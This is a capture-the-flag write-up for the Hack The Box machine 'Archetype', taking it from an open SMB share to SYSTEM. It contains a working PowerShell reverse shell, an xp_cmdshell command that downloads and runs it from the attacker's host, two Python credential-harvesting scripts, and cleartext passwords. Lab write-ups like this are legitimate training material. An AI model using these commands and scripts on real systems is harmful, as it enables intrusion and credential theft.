HTB - Archetype

Category: Machines
Difficulty: Easy
Description: -


Target Enumeration

The target IP is 10.10.10.27.
The first thing to do is scan it to see which ports are open and what is listening on them:

$ nmap -p- -sC -sV 10.10.10.27
Nmap scan report for 10.10.10.27
Host is up (0.045s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-06-11T11:08:50
|_Not valid after:  2051-06-11T11:08:50
|_ssl-date: 2021-06-11T11:13:13+00:00; +18m21s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h42m20s, deviation: 3h07m51s, median: 18m19s
| ms-sql-info:
|   10.10.10.27:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-06-11T04:13:05-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-06-11T11:13:02
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Two services stand out: SMB (139/445, on a Windows Server 2019 box, with message signing not required) and Microsoft SQL Server 2017 on 1433.

First let's see if the SMB server lets us list its shares anonymously:

$ smbclient -N -L \\\\10.10.10.27\\

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	backups         Disk
	C$              Disk      Default share
	IPC$            IPC       Remote IPC

Apart from ADMIN$, C$ and IPC$, which are the defaults, there is a share called backups. Let's see if we can access it without a password:

$ smbclient -N \\\\10.10.10.27\\backups
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Mon Jan 20 13:20:57 2020
  ..                                  D        0  Mon Jan 20 13:20:57 2020
  prod.dtsConfig                     AR      609  Mon Jan 20 13:23:02 2020

		10328063 blocks of size 4096. 8249512 blocks available
smb: \> get prod.dtsConfig

We can. The share contains a single file, prod.dtsConfig; after downloading it, here is its content:

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
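As an added example (not part of the original writeup), here is a small Python parser for .dtsConfig files that pulls the server, database, user and password out of every connection string that carries one. The embedded sample reproduces the prod.dtsConfig shown above plus a second, constructed Integrated Security entry (not from the target) to show that password-less connections are skipped; the DOMAIN\user split is exactly what you need later for Windows authentication against the SQL Server.

```python
"""Harvest credentials from SSIS .dtsConfig package configuration files.

Added example for this writeup, not part of the original page. Pass a
downloaded .dtsConfig as argv[1]; with no arguments it parses the embedded
sample, which reproduces the prod.dtsConfig above plus one constructed
Integrated Security entry (not from the target) to show the filtering.
"""
import re
import sys
import xml.etree.ElementTree as ET

SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Staging;Provider=SQLNCLI10.1;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>
"""

# One key=value pair. Values wrapped in {}, '' or "" may legitimately contain ';'
# (OLE DB allows that for passwords), so those are consumed as a single unit.
_PAIR_RE = re.compile(r"""\s*([^=;]+?)\s*=\s*(\{[^}]*\}|'[^']*'|"[^"]*"|[^;]*)\s*(?:;|$)""")

# Keyword aliases the OLE DB / SqlClient providers accept for the fields we care about.
_FIELDS = {
    "server": ("data source", "server", "address", "addr", "network address"),
    "database": ("initial catalog", "database"),
    "user": ("user id", "uid", "user"),
    "password": ("password", "pwd"),
}


def parse_connection_string(cs):
    """Return the connection string as a dict with lower-cased, trimmed keys."""
    pairs = {}
    for m in _PAIR_RE.finditer(cs):
        key, value = m.group(1).strip().lower(), m.group(2).strip()
        if len(value) >= 2 and value[0] + value[-1] in ("{}", "''", '""'):
            value = value[1:-1]  # drop the wrapping delimiters
        pairs[key] = value
    return pairs


def extract_credentials(cs):
    """Map provider keywords onto server/database/user/password and split DOMAIN\\user."""
    pairs = parse_connection_string(cs)
    creds = {}
    for field, names in _FIELDS.items():
        for name in names:
            if name in pairs:
                creds[field] = pairs[name]
                break
    if "user" in creds and "\\" in creds["user"]:
        creds["domain"], creds["user"] = creds["user"].split("\\", 1)
    return creds


def harvest_dtsconfig(xml_text):
    """One record per <Configuration> whose ConfiguredValue holds a password.

    Entries using Integrated Security (Windows auth of the running account) carry
    no secret and are skipped; they still tell you which servers the package touches.
    """
    hits = []
    for conf in ET.fromstring(xml_text).iter("Configuration"):
        value = conf.findtext("ConfiguredValue") or ""
        if "=" not in value:
            continue  # not a connection string (numeric or boolean property)
        creds = extract_credentials(value)
        if creds.get("password"):
            creds["path"] = conf.get("Path", "")
            hits.append(creds)
    return hits


if __name__ == "__main__":
    # .dtsConfig files written by SSIS are usually UTF-8 with a BOM; utf-8-sig strips it.
    text = open(sys.argv[1], encoding="utf-8-sig").read() if len(sys.argv) > 1 else SAMPLE_DTSCONFIG
    for hit in harvest_dtsconfig(text):
        who = f"{hit['domain']}\\{hit['user']}" if "domain" in hit else hit.get("user", "?")
        print(f"{hit['path']}\n  server={hit.get('server', '?')} db={hit.get('database', '?')} "
              f"user={who} password={hit['password']}")
```

Run it with the path of a downloaded .dtsConfig as the first argument, or with no arguments to parse the embedded sample. Data Source=. means the local instance, so a credential found this way is worth trying against port 1433 on the same host; SSIS package configurations store the password in cleartext unless the package itself was protected, which is why backup shares like this one are worth checking.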


Spawn a Shell

It is an SSIS (SQL Server Integration Services) package configuration file, and the Destination connection string inside it contains a cleartext password for the Windows account ARCHETYPE\sql_svc. Data Source=. means the local SQL Server instance, so the same credential should work against port 1433 on the target with Windows authentication. Let's try it (I used the mssqlclient.py script from Impacket):

$ mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'.
[*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
SQL>

The credential still works. Now we need to know whether our login is a member of the sysadmin fixed server role (the highest privilege level in SQL Server), because that is what we need to enable xp_cmdshell and turn database access into command execution:

SQL> SELECT IS_SRVROLEMEMBER ('sysadmin')


-----------

          1

It returns 1, so we are sysadmin. We can use sp_configure to enable xp_cmdshell, which lets us run operating-system commands as the SQL Server service account. "show advanced options" has to be turned on first, and each change needs a RECONFIGURE to take effect (the "changed from 1 to 1" messages below mean both options were already enabled on this box):

SQL> EXEC sp_configure "Show advanced options", 1
[*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure
SQL> EXEC sp_configure "xp_cmdshell", 1
[*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> reconfigure
SQL> xp_cmdshell "whoami"
output

--------------------------------------------------------------------------------

archetype\sql_svc

Now that we can execute shell commands, we want a proper interactive shell instead of one xp_cmdshell call per command. To get one we have to:

  1. listen on a port on our machine
  2. write a PowerShell reverse shell
  3. start an HTTP server to serve the file containing the reverse shell
  4. download and execute our PowerShell code from the SQL server

For step 1 we only have to start a netcat listener on a port with nc -lvnp 8888. Step 2 is this PowerShell code, which I saved in the file shell.ps1 (10.10.14.107 is my attacking machine's address on the lab VPN):

# Connect back to the attacker's listener (10.10.14.107:8888) and keep the socket open
$client = New-Object System.Net.Sockets.TCPClient("10.10.14.107",8888)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

# Read a command, run it with Invoke-Expression, and send stdout+stderr back followed by a "# " prompt
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );
    $sendback2 = $sendback + "# ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}

# The loop ends when the listener closes the connection
$client.Close()

Next we have to serve this file over HTTP. Python's built-in http.server module does this; run it inside the directory containing shell.ps1:

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Finally we have to download and execute the reverse shell on the SQL server. This runs PowerShell through xp_cmdshell, fetches shell.ps1 from our web server and evaluates it in memory with IEX, so nothing is written to disk (the inner double quotes are escaped because the whole command is passed as a double-quoted string):

SQL> xp_cmdshell "powershell IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.107/shell.ps1\");"

And in the netcat listener:

Connection received on 10.10.10.27 49680
> whoami
archetype\sql_svc


Privilege Escalation

Searching for a while on Google I found an article listing common privilege-escalation checks for Windows machines. One of them is the PowerShell command history: PSReadline saves every interactive command to ConsoleHost_history.txt under the user's AppData, and checking it for sql_svc I found this:

> type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit

So this user ran that command, which is interesting. Searching what net.exe use does I found this:

Connects a computer to or disconnects a computer from a shared resource, or displays information about computer connections. The command also controls persistent net connections. – Microsoft Docs

So it maps drive T: to the shared resource \\Archetype\backups, authenticating as the user administrator with the password MEGACORP_4dm1n!!. Because the password was typed on the command line, it was recorded in the history file in cleartext.
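The check generalises: every user's PowerShell history lives at the same path under their profile, and cleartext secrets land there whenever a password is passed on the command line. As an added example (not part of the original writeup), this Python script runs on the attacking machine over a copied history file (or over the pasted output of type) and flags lines that recorded a usable secret: net use with the password either before or after /user:, ConvertTo-SecureString -AsPlainText, cmdkey /pass: and schtasks /rp. The embedded sample reproduces the two lines recovered from sql_svc above; the remaining lines are constructed.

```python
r"""Triage PowerShell command history for credentials typed on the command line.

Added example for this writeup, not part of the original page. PSReadline keeps
each user's history at
  C:\Users\<user>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
Pull the file back (or paste the output of `type`) and run this script over it;
with no arguments it scans the embedded sample.
"""
import re
import sys

# Constructed sample history. The first two lines are the ones recovered from
# sql_svc on the target above; the rest are made up to exercise the other patterns.
SAMPLE_HISTORY = r"""net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
exit
net use Z: \\fileserver\share * /user:corp\bob
net use T: /delete
$p = ConvertTo-SecureString "Winter2021!" -AsPlainText -Force
cmdkey /add:srv01 /user:corp\svc_backup /pass:B4ckup#1
Get-ChildItem C:\backups
"""

_NET_USE_RE = re.compile(r"^\s*net(?:\.exe)?\s+use\b", re.I)
_USER_RE = re.compile(r"/user:(\S+)", re.I)

# Other one-liners that put a secret straight into the history file.
_SECRET_PATTERNS = [
    ("ConvertTo-SecureString", re.compile(
        r"""ConvertTo-SecureString\s+(?:-String\s+)?(['"])(?P<secret>.+?)\1.*?-AsPlainText""", re.I)),
    ("cmdkey /pass", re.compile(r"\bcmdkey\b.*?/pass:(?P<secret>\S+)", re.I)),
    ("schtasks /rp", re.compile(r"\bschtasks\b.*?/rp\s+(?P<secret>\S+)", re.I)),
]


def parse_net_use(line):
    r"""Parse `net use [drive] [\\server\share] [password|*] [/user:name] [/switches]`.

    The password is the only positional argument that is neither a device name nor a
    UNC path, and Windows accepts it before or after /user:. A bare * in the password
    position means "prompt for it", so no secret was recorded in that case.
    """
    if not _NET_USE_RE.match(line):
        return None
    rec = {"drive": None, "share": None, "user": None, "password": None}
    for tok in line.split()[2:]:
        if tok.lower().startswith("/user:"):
            rec["user"] = tok[len("/user:"):]
        elif tok.startswith("/"):
            continue  # /persistent:, /delete, /savecred, ...
        elif rec["drive"] is None and rec["share"] is None and (tok.endswith(":") or tok == "*"):
            rec["drive"] = tok  # a leading * means "next free drive letter"
        elif rec["share"] is None and tok.startswith("\\\\"):
            rec["share"] = tok
        elif tok != "*":
            rec["password"] = tok.strip('"')
    return rec


def find_secrets(history_text):
    """Scan history lines; return one hit per line that recorded a usable secret."""
    hits = []
    for lineno, line in enumerate(history_text.splitlines(), 1):
        nu = parse_net_use(line)
        if nu is not None:
            if nu["password"]:
                hits.append({"line": lineno, "kind": "net use", "user": nu["user"],
                             "target": nu["share"], "secret": nu["password"]})
            continue
        for kind, pat in _SECRET_PATTERNS:
            m = pat.search(line)
            if m:
                um = _USER_RE.search(line)
                hits.append({"line": lineno, "kind": kind, "user": um.group(1) if um else None,
                             "target": None, "secret": m.group("secret")})
                break
    return hits


if __name__ == "__main__":
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_HISTORY
    for h in find_secrets(text):
        print(f"line {h['line']:>4}  {h['kind']:<22} user={h['user']}  target={h['target']}  secret={h['secret']}")
```

Lines such as net use Z: \\fileserver\share * /user:corp\bob are skipped on purpose: the asterisk means the password was prompted for interactively and never reached the file. Hits with a target of None (ConvertTo-SecureString, cmdkey) tell you a secret but not where it is valid, so those still need the surrounding history lines for context.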

Now we can log in as administrator (I used another Impacket script, psexec.py, which uploads a service binary to the ADMIN$ share and starts it as a service, so the resulting shell runs as SYSTEM):

$ psexec.py administrator@10.10.10.27
Impacket v0.9.24.dev1+20210611.72516.1a5ed9dc - Copyright 2021 SecureAuth Corporation

Password:
[*] Requesting shares on 10.10.10.27.....
[*] Found writable share ADMIN$
[*] Uploading file tmtqEIBa.exe
[*] Opening SVCManager on 10.10.10.27.....
[*] Creating service piNd on 10.10.10.27.....
[*] Starting service piNd.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system